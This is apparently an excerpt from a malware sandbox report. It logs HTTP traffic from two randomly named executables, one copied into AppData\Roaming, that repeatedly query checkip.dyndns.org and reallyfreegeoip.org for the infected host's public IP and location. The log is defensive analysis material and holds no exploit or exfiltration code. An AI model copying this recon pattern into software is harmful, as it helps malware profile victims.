                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.449760132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:29.291100979 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:29.989221096 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 67a7b02ea8fec3c335b5edd06a5323d1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.449764132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:30.615340948 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:31.278855085 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: a75b0ab7afd68206e2f450209367110a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.449767132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:31.926182985 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:32.589632034 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 726cdb06590149c39157576ee8acb49e
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.449771132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:33.233355045 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:33.904340982 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:33 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 9dc349d1deccd2594aae50713280ddff
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449734188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:20 UTC678INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:20 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40215
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=azkTzNSOLs1q7KlG489%2BVTErPkjSyYN6GlSxzCHoMiqNeWGbl0DqiUqBoF9fhNMl4yCqrPvb8yAlmtxoHpf61fsX6MlUM%2BvLXrg8SL7QkuzK1RgzM%2BYNOJ7k122bA35pKYpWL1L%2B"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf64c8e1743a7-EWR
                                                                              2024-10-07 06:51:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449736188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:21 UTC676INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:21 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40216
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5WQ3syLkGVk7VOqrSpBfhHBgL6GZ0jCOow6pylIZRF8jO693PbDIIe0L%2BnntWSpiAQSFBh56qeE5z5PwGV9%2BAb0JRQ82M2%2B3Igxu4LAPgzjyTPZCiaxMQmt6ZLmdjNXwGGRI5vjB"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf651cd787cf3-EWR
                                                                              2024-10-07 06:51:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449739188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:22 UTC676INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:22 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40217
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4LW2AtNbGVTzp1EdfM%2BjUCiordQxrwM8cetq7CWihVU01CtwXRMXCt58i%2BGomcN8aU9HTisLXz0iT59LxwH%2FTlTvMMn2XkgK35ppXG7uB1yKLcOOnc3neEzn1KNmobssnosbhIg"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf659de6841ec-EWR
                                                                              2024-10-07 06:51:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449742188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:24 UTC680INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:24 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40219
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pk6l%2FXSBBv%2FfvXfmBWs83gEdw7rMUbQak8mbykc3NRsfvz0pQqmyE844MzQky5dlgpIAgeZbjPSgbAFyB2DUeS%2B%2FSmUrF6RbCdLc47JOEQJZiGbtPuNUaswxD8aV22OUdn%2BPepsc"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf66358048c60-EWR
                                                                              2024-10-07 06:51:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449743188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:24 UTC672INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:24 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40219
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfSulsD6ysjsUlpeboxF%2BBqKhAWT9GRdVbHm1LaZiK8AcMypCcu3WUA4CpHlD60GVTxYQr9KY9rGnj6xT7lzx3Y5wiwsiTYLRHTEhVnYQAbqXKsiXH2pC4mZ7tYEz57PGmq2msu7"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf6668b83729f-EWR
                                                                              2024-10-07 06:51:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449745188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:25 UTC708INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:25 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40220
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CH7uJFZqWSauoVNXYsqARp3O0f83Jq6akLJLU0coCER%2BcxGScf3xH79n%2Fe1Z8ofWgifMea%2Bahryj0pj596iDSkUwgjm3IYDEsOKkaq%2F5Zz9ZRP87u9jlwgtNK6xhwBq1YAoLYdZr"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf66b8edd5e62-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-10-07 06:51:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449746188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:25 UTC674INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:25 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40220
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJQ64qPbKov37VkBeE2ZE0c5Ums0lz9DHOyXpekXmxWoANYGW2h0%2Fheo5Lc4qgQ4QtLcYenjNTo6LCCcxBsec4jCZPQn7PLYs0Y6BHSo9KtKAULt0DOfmDy6TagWHpJP4dKSZVwu"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf66bbc41de95-EWR
                                                                              2024-10-07 06:51:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449749188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:26 UTC676INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:26 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40221
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r4zUqjcTslltdXxC7Zp3jdaViQ%2B4%2BzmU6kRcK62grz1Nb5FpIApVjxaA6Ig%2F7CDOtRnXYhe7CnkMH0BzCB4OgBMqgNEvsVpfTiCL9G1GEDuWITt2ImeSnKqrfyv9vnSHyyHMPrtE"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf6737cd119df-EWR
